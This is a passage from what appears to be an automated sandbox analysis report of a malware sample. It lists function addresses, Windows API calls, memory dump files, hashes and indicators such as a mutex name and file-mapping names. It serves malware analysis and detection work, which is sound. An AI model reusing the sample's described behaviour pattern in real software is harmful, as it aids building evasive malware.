                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31E04F76E00204CFDB20CFA4E8457ADB770FB48621F00426ADA15A2290C7351401CB60
                                                                                                                                                                                                                                                                                            Function 0144377A Relevance: 2.6, APIs: 2, Instructions: 111sleepmemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0001F200), ref: 014437F4
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442FFF: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000020,00000000), ref: 0144302B
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442FFF: WriteFile.KERNEL32(000000FF,014126B0,00000401,00000000,00000000), ref: 0144304E
                                                                                                                                                                                                                                                                                              • Part of subcall function 01442FFF: CloseHandle.KERNEL32(000000FF), ref: 01443058
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00004E20), ref: 01443852
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$AllocCloseCreateGlobalHandleSleepWrite
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 653111876-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 35cd866dc80d3a8f5c96e66e7bedf515885030c1a9215dcdff6adfbc8be4c7d1
                                                                                                                                                                                                                                                                                            • Instruction ID: 7400da8a9dc9e621428e7f457745a4dd797397175ebe5d6b9837bc051e875276
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35cd866dc80d3a8f5c96e66e7bedf515885030c1a9215dcdff6adfbc8be4c7d1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB41BBB29001146FE724DB65DC51BE5B3B9BB68700F0045E9E70DA3291DBB56F84CF91
                                                                                                                                                                                                                                                                                            Function 014358E9 Relevance: 1.5, APIs: 1, Instructions: 29registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01435983
                                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 01435AF0
                                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000004), ref: 01435B2D
                                                                                                                                                                                                                                                                                            • RegCloseKey.KERNEL32(00000000), ref: 01435BFB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: wsprintf$CloseQueryValue
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2158237808-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 21d4a687fea6533632a19bd05078c3396c76761eef0314e4d710f98cebbab5ca
                                                                                                                                                                                                                                                                                            • Instruction ID: 2e5e57c018bc9d8cb6defbdbcd90e21e9eb44770ce506ecf86b38ac5846b67b5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21d4a687fea6533632a19bd05078c3396c76761eef0314e4d710f98cebbab5ca
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F0F970A01118DBCB25DF98E9887ADB7B1BF8C319F1441DAD409AB261C7349E81DF44
                                                                                                                                                                                                                                                                                            Function 00AB5353 Relevance: 1.3, APIs: 1, Instructions: 26memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,000000B5,00003000,00000004,?,?,00AB1E5E,00AB2BD2,?,?,00AB2BD2,?), ref: 00AB5372
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6c4b1975894e279d52ffe9acc9e8bb68e1205775d49b226886c33ab618e87d6f
                                                                                                                                                                                                                                                                                            • Instruction ID: 32dfc9e22fc16d2ae86ac3683891bcf5a3a201b490133030e2b423f5b6fc0adb
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c4b1975894e279d52ffe9acc9e8bb68e1205775d49b226886c33ab618e87d6f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E2E0C2667457043AE61962959C13FAB3A9ECBC1BA0F500028F31C892C2EDD3EA4082B2
                                                                                                                                                                                                                                                                                            Function 00AB538C Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00AB1DBA,00000000), ref: 00AB53AD
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 80499a4e758efeafde4740f11a872beda5f1149f3b9d85e7506012a5679b19c5
                                                                                                                                                                                                                                                                                            • Instruction ID: bfd0e27fca3c9a3ec411e4037df63d10362ff33251e5a69c25078e394eaf08c0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80499a4e758efeafde4740f11a872beda5f1149f3b9d85e7506012a5679b19c5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BDC012311447487DF7141A94DD0BF9836989740750FA08015B70C2C4E29DE269D08984
                                                                                                                                                                                                                                                                                            Function 00AB5307 Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00AB62E9,00003000,00000004,?,00AB62E9,00000105), ref: 00AB5324
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7fb11031cc54d8f83349e0f9588b23a7eca0690d6abafcf8e5e7954296c7c82b
                                                                                                                                                                                                                                                                                            • Instruction ID: 3b721d181d8baeaa910ad5ce49b1db84ac16dab07d458fc88fa65207216d8c1c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7fb11031cc54d8f83349e0f9588b23a7eca0690d6abafcf8e5e7954296c7c82b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FC04C722DA3087EF91566D1AD13F993A4D8B41F64F600005F71C5C4D398D36690459A
                                                                                                                                                                                                                                                                                            Function 00AB2371 Relevance: 1.3, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00AB58E4,?,00AB58E4,00000000), ref: 00AB2385
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 845934ae5a48bab628032eac2e73e6d8934a6fe34b879d1db014cc76bfa65141
                                                                                                                                                                                                                                                                                            • Instruction ID: 4ada55fc9659bbb92cd1a498f2af9fa5bc72a5a37121cac29de268358626abc5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 845934ae5a48bab628032eac2e73e6d8934a6fe34b879d1db014cc76bfa65141
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00B0927264C20C3EEA2426D1ED0BE983B8DCB80760FA00116FA1D880A3ADE36A9054D5

                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                            Function 0143B614 Relevance: 4.5, Strings: 3, Instructions: 792COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CountExchangeInterlockedTick
                                                                                                                                                                                                                                                                                            • String ID: x$z${
                                                                                                                                                                                                                                                                                            • API String ID: 3499635708-1334427886
                                                                                                                                                                                                                                                                                            • Opcode ID: bf91f54e868330591c2ae1744ada7ab4113e2146d9c8652e08955aaa0f10ec2f
                                                                                                                                                                                                                                                                                            • Instruction ID: 77a6e871247ea7aea5d102ec9b7b40a94683a05ddaf0be21e5e559e125945905
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf91f54e868330591c2ae1744ada7ab4113e2146d9c8652e08955aaa0f10ec2f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4622CB1D0010AEFDB18DF98C981BAE77B1FF98314F24822EE519A7390D7349A55CB91
                                                                                                                                                                                                                                                                                            Function 01446CD0 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: b34de2dd3e5a47bf902419ab1c7d84cadde84a4a5e0484e75ccd932de529da84
                                                                                                                                                                                                                                                                                            • Instruction ID: 136b83c9cf55ee1c14d451961a30d457fd7f2393f8b8d7ad7a9ee7d0eb079051
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b34de2dd3e5a47bf902419ab1c7d84cadde84a4a5e0484e75ccd932de529da84
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D715070E0414A8BEB05CF69C4607BFBBF2EF8A304F19C06AD995EB351D6359942CB90
                                                                                                                                                                                                                                                                                            Function 00AB14BA Relevance: .0, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1708059623.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1707888832.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000AB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708277267.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C70000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1708397805.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1710967277.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711811568.00000000010BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712196083.00000000010CE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_ab0000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: a268b256d4f302921f627ebf3a9c5e4ee6871995a5c938300b70ff3fa20628a4
                                                                                                                                                                                                                                                                                            • Instruction ID: b0a480ec83b9686749ea86de4cfc2be4b24a2be8b9e5839dcd2ecc005ba9811a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a268b256d4f302921f627ebf3a9c5e4ee6871995a5c938300b70ff3fa20628a4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BF039326116248BC630DB69C1A4A9AF3ECFB81B60F894466E84D97B12C334FC4186D0
                                                                                                                                                                                                                                                                                            Function 014BD765 Relevance: 36.9, APIs: 12, Strings: 9, Instructions: 162libraryfilesleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNELBASE(KERNEL32.DLL,00000000,00000000), ref: 014BD831
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00008002), ref: 014BD858
                                                                                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(-00000001,00000000,00000004,00000000,00008000,hh8geqpHJTkdns6), ref: 014BD872
                                                                                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,purity_control_7728), ref: 014BD88C
                                                                                                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00015400), ref: 014BD8A2
                                                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,014BEED8,000001FE), ref: 014BD935
                                                                                                                                                                                                                                                                                            • LoadLibraryExA.KERNELBASE(SHELL32.DLL,00000000,00000000), ref: 014BD954
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNELBASE(00000000,ShellExecuteA), ref: 014BD962
                                                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 014BD98F
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 014BD996
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(000927C0), ref: 014BD9A5
                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32(00000000), ref: 014BD9AD
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.1712829927.00000000014BD000.00000040.00001000.00020000.00000000.sdmp, Offset: 01410000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001410000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.0000000001430000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712829927.00000000014C5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_1410000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Create$ErrorLibraryLoadMapping$AddressExitLastModeModuleMutexNameProcProcessSleepView
                                                                                                                                                                                                                                                                                            • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                                                                            • API String ID: 3566498206-162185446
                                                                                                                                                                                                                                                                                            • Opcode ID: f5ab8bca800e80db9e22ae4d65cbed415d5f878ddc5468322e3c306591d773ed
                                                                                                                                                                                                                                                                                            • Instruction ID: 34b9b64e69f4ad07fedd7fb85fde9020d1928fc0bf3abca7060e6d614ad8a412
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f5ab8bca800e80db9e22ae4d65cbed415d5f878ddc5468322e3c306591d773ed
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51615571A40289ABEF10DFA0CC89FEA3769AF44705F440566EE0DBE1F0D6B15645872E
                                                                                                                                                                                                                                                                                            Function 0144195D Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 216stringsharesleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
